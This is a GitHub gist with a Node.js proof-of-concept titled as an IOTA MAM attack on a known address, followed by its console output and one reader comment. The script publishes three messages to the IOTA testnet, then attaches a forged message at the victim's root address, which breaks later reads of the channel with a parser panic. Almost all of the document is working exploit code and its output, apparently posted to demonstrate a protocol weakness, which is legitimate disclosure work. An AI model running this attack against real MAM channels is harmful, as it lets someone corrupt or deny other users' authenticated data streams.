Created
March 1, 2018 13:02
-
-
Save linkcd/72b08593b57ef39a576bf80f8390ea87 to your computer and use it in GitHub Desktop.
Demo code of IOTA MAM attack on a known address
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var fetch = require('node-fetch') | |
| var crypto = require('crypto') | |
| var Mam = require('./mam.node.js') | |
| var IOTA = require('iota.lib.js') | |
| var iota = new IOTA({ provider: `https://nodes.testnet.iota.org:443/` }) | |
| // Random Key Generator | |
| const keyGen = length => { | |
| var charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ9' | |
| var values = crypto.randomBytes(length) | |
| var result = new Array(length) | |
| for (var i = 0; i < length; i++) { | |
| result[i] = charset[values[i] % charset.length] | |
| } | |
| return result.join('') | |
| } | |
| // Generate seed | |
| let seed = keyGen(81) | |
| // Initialise MAM State | |
| let mamState = Mam.init(iota, seed) | |
| console.log ("seed: " + seed) | |
| // Publish to tangle | |
| const normalPublish = async packet => { | |
| // Create Trytes | |
| var trytes = iota.utils.toTrytes(JSON.stringify(packet)) | |
| // Get MAM payload | |
| var message = Mam.create(mamState, trytes) | |
| // Save new mamState | |
| mamState = message.state | |
| // Attach the payload. | |
| await Mam.attach(message.payload, message.address) | |
| console.log("Root: " + message.root) | |
| console.log("Address: " + message.address) | |
| return message.root | |
| } | |
| const attackPublish = async (packet, victimAddress) => { | |
| // Create Trytes | |
| var trytes = iota.utils.toTrytes(JSON.stringify(packet)) | |
| // Get MAM payload | |
| var message = Mam.create(mamState, trytes) | |
| // Save new mamState | |
| mamState = message.state | |
| // attack | |
| message.address = victimAddress | |
| console.log("Victim address is " + myroot) | |
| // Attach the payload. | |
| await Mam.attach(message.payload, message.address) | |
| console.log("Root: " + message.root) | |
| console.log("Address: " + message.address) | |
| return message.root | |
| } | |
| // Callback used to pass data out of the fetch | |
| const logData = data => console.log(JSON.parse(iota.utils.fromTrytes(data))) | |
| const listen = async myroot => { | |
| // Callback used to pass data + returns next_root | |
| var resp = await Mam.fetch(myroot, 'public', null, logData) | |
| console.log(JSON.stringify(resp)) | |
| } | |
| let myroot | |
| const execute = async () => { | |
| myroot = await normalPublish("AAA") | |
| await normalPublish("BBB") | |
| await normalPublish("CCC") | |
| await listen(myroot) | |
| console.log("-----------attack root------------") | |
| await attackPublish("XXX", myroot) | |
| console.log("------------now try to read again---------------------") | |
| await listen(myroot) | |
| } | |
| execute() |
Hi,why is the Root equal to the Address in normalpublish? In my practice, the root is not the address at all.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Output:
seed: NCBEZG9UDNAWKZZLIVZGWRCTFSAJTFWVDAAZLXBL9QEDDVRQITVQVDVCIHFXSGJLNPDGHBPDPKRXIIZUD
Message attached
Root: YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
Address: YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
Message attached
Root: NNOHUGDB9ZFMJNMOPHQJNJUHQM9HDLY9JWVKTVSQZWYOWXFQHGBUYGQEXQQWZGVVTXQQVGZTENCXLFVOY
Address: NNOHUGDB9ZFMJNMOPHQJNJUHQM9HDLY9JWVKTVSQZWYOWXFQHGBUYGQEXQQWZGVVTXQQVGZTENCXLFVOY
Message attached
Root: AI9MJSUFE9X9JZXXMJGQKWEAPFYDLOBEUAVUCIJ9P9OTRXKHOMDJXKFPAZQUXIMUXMNKVP9HTSJWYNJRM
Address: AI9MJSUFE9X9JZXXMJGQKWEAPFYDLOBEUAVUCIJ9P9OTRXKHOMDJXKFPAZQUXIMUXMNKVP9HTSJWYNJRM
Looking up data at: YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
AAA
Looking up data at: NNOHUGDB9ZFMJNMOPHQJNJUHQM9HDLY9JWVKTVSQZWYOWXFQHGBUYGQEXQQWZGVVTXQQVGZTENCXLFVOY
BBB
Looking up data at: AI9MJSUFE9X9JZXXMJGQKWEAPFYDLOBEUAVUCIJ9P9OTRXKHOMDJXKFPAZQUXIMUXMNKVP9HTSJWYNJRM
CCC
Looking up data at: CJOWISTVML9JTNVAIOSNXEGVMBQGRLIOYQMISBPHPKTLNQPDTSLZTQAVSSJYRIDVDQM9MOENXISINFSZN
Total transaction count: 9
{"nextRoot":"CJOWISTVML9JTNVAIOSNXEGVMBQGRLIOYQMISBPHPKTLNQPDTSLZTQAVSSJYRIDVDQM9MOENXISINFSZN"}
-----------attack root------------
Victim address is YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
Message attached
Root: CJOWISTVML9JTNVAIOSNXEGVMBQGRLIOYQMISBPHPKTLNQPDTSLZTQAVSSJYRIDVDQM9MOENXISINFSZN
Address: YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
------------now try to read again---------------------
Looking up data at: YNCWHP9JBKHRJVMYIOYJVNSBWLDQPABWIOYCAKLTHWVQKOKONAY9AMBAGSKD9KCYJAFDCBVWPKUKJHAVE
thread '' panicked at 'called
Option::unwrap()on aNonevalue', /checkout/src/libcore/option.rs:335:20note: Run with
RUST_BACKTRACE=1for a backtrace.failed to parse: 5321040
undefined